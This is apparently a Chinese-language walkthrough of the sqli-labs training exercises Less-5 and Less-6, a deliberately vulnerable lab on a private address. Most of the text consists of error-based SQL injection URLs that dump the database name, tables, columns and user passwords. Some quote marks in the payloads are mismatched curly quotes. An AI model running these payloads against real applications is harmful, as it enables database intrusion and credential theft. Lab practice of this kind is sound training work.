Less-5
1. 首先判断闭合方式和字段:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' --+
闭合方式为单引号,字段数为3;
2. 查看显示位
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' union select 1,1,1 --+
可以看到,语句已经执行了,但是没有显示位,所以没有显示出来我们想要的结果;less-5跟前面的四关已经有所区别了,没有显示位那我们就不能用union联合查询了;所以第五关之后我们需要用另一种思路来注入即报错注入;
报错注入传送门:link
3. 利用报错语句爆库、表、字段、数值
http://192.168.228.129/sqli-labs-master/Less-5/?id=1’ AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
根据回显的结果得到库名为security;然后我们继续用报错语句注入来得到表名:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1‘ AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(TABLE_NAME AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=’SECURITY‘ LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
得到第一个数据表,我们可以用limit语句来控制,依次得到所有的数据表:
拿到users表名,然后来用报错语句得到字段:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(COLUMN_NAME AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='SECURITY' AND%20TABLE_NAME='USERS' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
用limit函数控制得到所有的字段或者用group_concat,分别是:id-username-password;之后,我们来爆数据:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1’ AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(USERNAME) AS CHAR),0x7e)) FROM security.users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
把USERNAME换成password就可以得到密码,然后用limit可以依次得到users表中所有字段的数据;
Less-6
less-6跟less-5类似,都可以用报错注入来的到最终得数据,只是闭合方式不同;